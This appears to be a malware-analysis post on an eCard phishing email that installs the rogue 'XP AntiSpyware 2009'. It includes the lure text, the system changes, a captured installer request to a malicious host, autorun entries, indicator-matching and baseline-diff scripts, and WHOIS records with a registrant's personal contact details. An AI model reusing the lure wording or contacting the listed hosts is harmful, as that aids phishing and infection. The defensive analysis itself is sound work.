Subject: You have received an eCard

Body (the lure is reproduced as received, misspellings included):

Good day.
You have received an eCard
To pick up your eCard, choose from any of the following options:
Click on the following link (or copy & paste it into your web browser):
[link removed]/e-card.exe
Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!
We hope you enjoy you eCard.
Thank You!
Upon execution, eCard.exe immediately reboots the computer. A very unpleasant surprise awaits the victim on reaching the desktop: the antivirus and firewall have been disabled by deleting their services and startup entries.
braviax.exe has been set to run at boot.
A new tray icon appears, claiming that the computer is infected with spyware.
Clicking on the icon or its message launches the installer that was previously downloaded from the web.
XP AntiSpyware 2009 is downloaded from the internet and installed on the PC.
Now, I had a good laugh when I saw this fatal error during the initial scan ...
The rogue also installs a fake Windows Security Center with a link to buy a license for XP Antispyware 2009.
In the meantime, several changes have been made to the system:
- Existing antivirus and firewall solutions are destroyed.
- Notification of firewall, antivirus and/or update status through the real Windows Security Center has been disabled.
- The Internet Explorer start page and search provider have been changed to google.com.
- Explorer.exe has been forced into "classic view", so the usual tasks and links on the left-hand pane are missing.
- Several Internet security settings have been lowered, leaving the system open to additional infections while browsing.
- Beep.sys has been replaced:
c:\WINDOWS\system32\drivers\beep.sys
Kaspersky: Backdoor.Win32.UltimateDefender.a
Old date: 8/4/2004 2:00 PM
New date: 10/9/2008 4:37 PM
Old size: 4,224 bytes
New size: 27,648 bytes
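The beep.sys swap above is the kind of change a baseline comparison catches even when the file name is untouched: a stock 4 KB driver suddenly weighs 27 KB and carries a 2008 timestamp. The script below is an added example, not code from the original post. It diffs a driver inventory against a recorded baseline and reports modified, missing and added files; `snapshot_directory()` inventories a real folder, while the `BASELINE` and `CURRENT` inventories are constructed for the example (the beep.sys sizes and dates are the ones from the post; `example.sys` and `dropped.sys` are placeholders).

```python
"""Added example (not code from the original post): diff a driver inventory
against a recorded baseline and flag files whose size or timestamp changed,
as beep.sys did above (4,224 bytes from 2004 -> 27,648 bytes dated 2008).

snapshot_directory() inventories a real folder; the BASELINE and CURRENT
inventories below are constructed for the example. The beep.sys values are
the ones from the post; 'example.sys' and 'dropped.sys' are placeholders.
"""
import os
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List


@dataclass(frozen=True)
class FileRecord:
    size: int          # bytes
    mtime: datetime    # last-modified timestamp


def norm(path: str) -> str:
    """Windows paths are case-insensitive, so key the inventory in lower case."""
    return path.replace("/", "\\").lower()


def snapshot_directory(directory: str) -> Dict[str, FileRecord]:
    """Inventory every regular file directly inside `directory` by full path."""
    inventory: Dict[str, FileRecord] = {}
    with os.scandir(directory) as entries:
        for entry in entries:
            if entry.is_file(follow_symlinks=False):
                st = entry.stat(follow_symlinks=False)
                inventory[norm(entry.path)] = FileRecord(
                    st.st_size, datetime.fromtimestamp(st.st_mtime))
    return inventory


def compare_to_baseline(baseline: Dict[str, FileRecord],
                        current: Dict[str, FileRecord]) -> List[dict]:
    """Return one finding per file that is modified, missing or newly added.

    A replaced system driver shows up as 'modified' even when the attacker kept
    the file name, which is exactly the beep.sys case in the post."""
    findings: List[dict] = []
    for path, base in sorted(baseline.items()):
        cur = current.get(path)
        if cur is None:
            findings.append({"path": path, "change": "missing"})
        elif cur != base:
            findings.append({"path": path, "change": "modified",
                             "old_size": base.size, "new_size": cur.size,
                             "old_mtime": base.mtime, "new_mtime": cur.mtime})
    for path in sorted(current.keys() - baseline.keys()):
        findings.append({"path": path, "change": "added"})
    return findings


def format_finding(f: dict) -> str:
    """One report line per finding, sizes with thousands separators."""
    if f["change"] != "modified":
        return f"{f['change'].upper():9} {f['path']}"
    return (f"MODIFIED  {f['path']}: {f['old_size']:,} bytes "
            f"({f['old_mtime']:%Y-%m-%d %H:%M}) -> {f['new_size']:,} bytes "
            f"({f['new_mtime']:%Y-%m-%d %H:%M})")


DRIVERS = r"c:\WINDOWS\system32\drivers"

# Constructed baseline: the drivers folder on the clean system.
BASELINE = {
    norm(DRIVERS + r"\beep.sys"):    FileRecord(4224, datetime(2004, 8, 4, 14, 0)),
    norm(DRIVERS + r"\example.sys"): FileRecord(12288, datetime(2004, 8, 4, 14, 0)),
}

# Constructed post-infection inventory: beep.sys replaced as in the post;
# dropped.sys is a placeholder included only to exercise the 'added' branch.
CURRENT = {
    norm(DRIVERS + r"\beep.sys"):    FileRecord(27648, datetime(2008, 10, 9, 16, 37)),
    norm(DRIVERS + r"\example.sys"): FileRecord(12288, datetime(2004, 8, 4, 14, 0)),
    norm(DRIVERS + r"\dropped.sys"): FileRecord(51200, datetime(2008, 10, 9, 16, 37)),
}

if __name__ == "__main__":
    for finding in compare_to_baseline(BASELINE, CURRENT):
        print(format_finding(finding))
```

Size and timestamp are enough to surface this particular swap, but a real baseline should also record a cryptographic hash of each file, since a replacement padded to the original size and back-dated with a copied timestamp would pass this check.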
<h4>Visible signs.</h4>

HTTP request captured during the infection:

```http
GET /update_inst.php?wmid=1058&subid=[removed] HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: do-monster-scan.com
Connection: Keep-Alive
```

HijackThis entries:

```
O4 - HKLM\..\Run: [braviax] C:\WINDOWS\system32\braviax.exe
O4 - HKLM\..\Run: [XP Antispyware 2009] "C:\Program Files\XP_AntiSpyware\XP_AntiSpyware.exe" /hide
O4 - HKCU\..\Run: [braviax] C:\WINDOWS\system32\braviax.exe
O20 - AppInit_DLLs: karna.dat
```
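The request and the autorun entries above are the indicators a defender would want to match in proxy logs and in HijackThis output. The script below is an added example, not code from the original post. It parses raw HTTP request heads and HijackThis-style O4/O20 lines and reports why each one matches: the domains, IP addresses, file names and the bare "Microsoft Internet Explorer" User-Agent are copied from this post (a genuine IE string starts with "Mozilla/4.0 (compatible; MSIE ...)"), while the sample requests and log lines are constructed for the example, with the subid left redacted as in the post and one benign item of each kind as a control.

```python
"""Added example (not code from the original post): match the indicators above
against raw HTTP requests and HijackThis-style autorun entries.

Domains, IPs, file names and the bare User-Agent are copied from the post; the
sample requests and log lines below are constructed for the example, with one
benign item of each kind so the output shows a negative as well."""
import re
from typing import Dict, List

BAD_DOMAINS = {"do-monster-scan.com", "do-scan-progress.com",
               "xp-antispyware2009.com", "av-pro2009.com",
               "antiviruspro2009.com"}
BAD_IPS = {"208.73.210.32", "206.161.120.20", "216.195.58.160"}
BAD_FILES = {"braviax.exe", "karna.dat", "xp_antispyware.exe", "e-card.exe"}
# Genuine IE sends "Mozilla/4.0 (compatible; MSIE x.x; ...)"; a bare product
# name is the rogue's own downloader, not the browser.
BOGUS_USER_AGENT = "Microsoft Internet Explorer"


def parse_http_request(raw: str) -> Dict[str, str]:
    """Split a request head into {'method', 'path', <lower-cased headers>}."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    method, path, _version = lines[0].split(" ", 2)
    request = {"method": method, "path": path}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        request[name.strip().lower()] = value.strip()
    return request


def check_http_request(raw: str) -> List[str]:
    """Return the reasons (possibly none) this request looks like rogue-AV traffic."""
    req = parse_http_request(raw)
    reasons: List[str] = []
    host = req.get("host", "").split(":")[0].lower()
    if host in BAD_DOMAINS or host in BAD_IPS:
        reasons.append(f"host {host} is a known rogue-AV distribution point")
    if req.get("user-agent") == BOGUS_USER_AGENT:
        reasons.append("bare 'Microsoft Internet Explorer' User-Agent, not a real browser string")
    if req["path"].split("?")[0].endswith("/update_inst.php"):
        reasons.append("installer-fetch path seen in the post's capture")
    return reasons


_O4 = re.compile(r"^O4 - (HKLM|HKCU)\\\.\.\\(\w+): \[(.*?)\] (.*)$")
_O20 = re.compile(r"^O20 - AppInit_DLLs: (.*)$")


def _program_basename(command: str) -> str:
    """First token of a Run-key command (quoted or not), reduced to its file name."""
    m = re.match(r'"([^"]+)"|(\S+)', command.strip())
    path = (m.group(1) or m.group(2)) if m else ""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_hijackthis_line(line: str) -> List[str]:
    """Flag O4 (Run key) and O20 (AppInit_DLLs) entries that match the indicators."""
    reasons: List[str] = []
    m = _O4.match(line)
    if m:
        hive, key, name, command = m.groups()
        exe = _program_basename(command)
        if exe in BAD_FILES:
            reasons.append(f"{hive} {key} entry [{name}] launches known rogue file {exe}")
    m = _O20.match(line)
    if m:
        # AppInit_DLLs is worth a look whatever it names: the DLL is injected
        # into every process that loads user32.dll.
        dll = m.group(1).strip().lower()
        note = " (known rogue component)" if dll in BAD_FILES else ""
        reasons.append(f"AppInit_DLLs loads {dll} into every process that "
                       f"loads user32.dll{note}")
    return reasons


def scan(requests: List[str], hijackthis_lines: List[str]) -> Dict[str, List[str]]:
    """Map each flagged item (its first line) to its reasons; clean items are omitted."""
    hits: Dict[str, List[str]] = {}
    for raw in requests:
        reasons = check_http_request(raw)
        if reasons:
            hits[raw.strip().splitlines()[0]] = reasons
    for line in hijackthis_lines:
        reasons = check_hijackthis_line(line)
        if reasons:
            hits[line] = reasons
    return hits


# Constructed samples: the first request and the first four entries reproduce
# the post's capture; the remaining ones are benign controls.
SAMPLE_REQUESTS = [
    "GET /update_inst.php?wmid=1058&subid=[removed] HTTP/1.1\n"
    "User-Agent: Microsoft Internet Explorer\n"
    "Host: do-monster-scan.com\n"
    "Connection: Keep-Alive\n",
    "GET /index.html HTTP/1.1\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\n"
    "Host: www.example.com\n"
    "Connection: Keep-Alive\n",
]
SAMPLE_HIJACKTHIS = [
    r"O4 - HKLM\..\Run: [braviax] C:\WINDOWS\system32\braviax.exe",
    r'O4 - HKLM\..\Run: [XP Antispyware 2009] "C:\Program Files\XP_AntiSpyware\XP_AntiSpyware.exe" /hide',
    r"O4 - HKCU\..\Run: [braviax] C:\WINDOWS\system32\braviax.exe",
    r"O20 - AppInit_DLLs: karna.dat",
    r"O4 - HKLM\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe",
]

if __name__ == "__main__":
    for item, reasons in scan(SAMPLE_REQUESTS, SAMPLE_HIJACKTHIS).items():
        print(item)
        for reason in reasons:
            print("   -", reason)
```

The O20 check deliberately fires on any non-empty AppInit_DLLs value, not only on karna.dat: on a typical XP install that value is empty, so anything there deserves a look regardless of the file name the rogue happens to use.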
<h4>IP details.</h4>
do-scan-progress.com - 208.73.210.32
Registrant:
Shestakov Yuriy alexvasiliev1987@cocainmail.com +7.9218839910
Shestakov Yuriy
Lenina 21 16
Mirniy,MSK,RU 102422
Domain Name: do-scan-progress.com
Record last updated at 2008-10-01 20:45:22
Record created on 2008/9/29
Record expired on 2009/9/29
Domain servers in listed order:
ns1.dsredirection.com
ns2.dsredirection.com
Administrator:
name: Shestakov Yuriy
mail: alexvasiliev1987@cocainmail.com tel: +7.9218839910
org: Shestakov Yuriy
address: Lenina 21 16
city: Mirniy
province: MSK
country: RU
postcode: 102422
Registration Service Provider:
name: Shestakov Yuriy
tel: +7.9218839910
fax: +7.9218839910
web:
______________________________
www.xp-antispyware2009.com - 206.161.120.20
Registrant:
Shestakov Yuriy alexvasiliev1987@cocainmail.com +7.9218839910
Shestakov Yuriy
Lenina 21 16
Mirniy,MSK,RU 102422
Domain Name: xp-antispyware2009.com
Record last updated at 2008-10-01 14:10:01
Record created on 2008/9/30
Record expired on 2009/9/30
Domain servers in listed order:
ns1.softwarenameservers.com
ns2.softwarenameservers.com
Hostnames sharing this IP address (A records):
- av-pro2009.com
- www.antiviruspro2009.com
- xp-antispyware2009.com
do-monster-scan.com - 216.195.58.160
Registrant:
Shestakov Yuriy alexvasiliev1987@cocainmail.com +7.9218839910
Shestakov Yuriy
Lenina 21 16
Mirniy,MSK,RU 102422
Domain Name: do-monster-scan.com
Record last updated at 2008-10-01 20:46:28
Record created on 2008/9/29
Record expired on 2009/9/29
Domain servers in listed order:
ns1.nameservanos.com
ns2.nameservanos.com